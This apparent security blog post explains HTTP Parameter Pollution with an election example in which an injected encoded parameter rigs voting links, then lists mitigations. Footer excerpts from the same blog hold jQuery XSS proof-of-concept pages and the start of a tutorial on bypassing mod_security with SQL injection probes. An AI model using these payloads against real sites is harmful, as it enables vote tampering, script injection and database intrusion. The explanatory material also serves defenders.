HTTP Parameter Pollution

A new class of Injection Vulnerability called HTTP Parameter Pollution (HPP) is less known

– Has not received much attention
– First presented by S. di Paola and L. Carettoni at OWASP 2009

• Attack consists of injecting encoded query string delimiters into existing HTTP parameters (e.g. GET/POST/Cookie)

– If application does not sanitize its inputs, HPP can be used to launch client-side or server-side attacks

– Attacker may be able to override existing parameter values, inject a new parameter or exploit variables out of a direct reach

“An attacker overrides or adds HTTP GET/POST parameters by injecting query string delimiters. Via HPP it may be possible to override existing hardcoded HTTP parameters, modify the application behaviors, access and, potentially exploit, uncontrollable variables, and bypass input validation checkpoints and WAF rules”.

HTTP Parameter Handling

•During interaction with web application, client provides parameters via GET/POST/Cookie

http://www.site.com/login?login=alice

• HTTP allows the same parameter to be provided twice

– E.g., in a form checkbox

http://www.w3schools.com/html/tryit.asp?filename=tryhtml_form_checkbox

• What happens when the same parameter is provided twice?

http://demo.testfire.net/search.aspx?txtSearch=alice&txtSearch=bob


demo.testfire.net


Yahoo

An HTTP Parameter Pollution (HPP) attack occurs

– When a malicious parameter P(inj), preceded by an encoded query string delimiter (e.g. %26), is injected into an existing parameter P(host)

Typical scenario (client-side)
Web application for election for two candidates

Url : http://host/election.jsp?poll_id=4568

Link1: <a href="vote.jsp?poll_id=4568&candidate=white”> Vote for Mr.White </a>

Link2:<a href="vote.jsp?poll_id=4568&candidate=green”>Vote for Mrs.Green </a>


The two links are built from the URL

ID = Request.getParameter(“poll_id”)
href_link = “vote.jsp?poll_id=” + ID + ”&candidate=xyz”

No sanitization

poll_id is vulnerable and Attacker creates URL:

http://host/election.jsp?poll_id=4568%26candidate%3Dgreen

The resulting page now contains injected links:

<a href=vote.jsp?poll_id=4568&candidate=green&candidate=white>
Vote for Mr. White </a>

<a href=vote.jsp?poll_id=4568&candidate=green&candidate=green>
Vote for Mrs. Green </a>

If the developer expects to receive a single value
Jsp’s Request.getParameter(“candidate”)returns the 1st value
– The parameter precedence is consistent…

Candidate Mrs. Green is always voted!

Consequence
• Override existing (hardcoded) values
• Inject a new parameter
• Exploit a parameter out of a direct reach
• Client-side (user) or server-side (webapplication) attack

Solutions and Mitigations
• Configuration: If using a Web Application Firewall (WAF), filters should be carefully configured to detect abnormal HTTP requests
• Design: Perform URL encoding
• Implementation: Use strict regular expressions in URL rewriting
• Implementation: Beware of multiple occurrences of a parameter in a Query String


Cheers!!!!!!!!!

Comments

Post a Comment

Popular posts from this blog

Location.Hash exploit || JQuery 1.11.3/1.7.2/1.6.1 Cross Site Scripting

Image
This is the code for exploiting (location.hash) JQuery for Cross Site Scripting: <html>     <head>          <title>Jquery XSS Test 1</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <script>                     $(location.hash.split('#')[1]);                 </script>    </head>      <body>         Jquery DOM XSS     </body> </html> OR, <html>     <head>          <title>Jquery XSS Test 2</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <
Read more

JQuery UI 1.11.4 Cross Site Scripting

Vulnerability name: XSS Reflected JQuery UI 1.11.4  I think nearly everyone gets shocked, when your Acunetix shows Cross Site Scripting in Jquery UI. But, may be many of you don’t know how to exploit it. So, here is a Code which will explain how to exploit vulnerabilities like these. Place the script on dialog function as shown in the Code below. <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head>     <title>XSS in closeText option of component ui dialog</title>     <script src="https://code.jquery.com/jquery-2.1.4.js"></script>     <script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>       <script>         $(document).ready(function () {             $('#dialog').dialog({ closeText: ' <script>alert("XSS")<\/script> ' });         });     </script> </head> <body>   
Read more

Bypass Mod_Security

Image
This topic is similar as Manual Sql Injection. But mod_security are protect to hack website. You can see in this screenshot. Now In this tutorial we can learn how to bypass mod_security First we need one Target Website In My case I am using this website: http://www.target.com.pk Finding The Amount Of Columns Now that you found a vulnerable site, you need to find the amount of columns. You can do this by using the "Order By" function. Your link should now look like this: Code: http://www.target.com.pk/pages.php?ID=18 order by 1--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 2--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 3--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 4--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 5--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 6--+ (error) Finding Vulnerable Columns So now that you got the amount of columns, you're going to want to see
Read more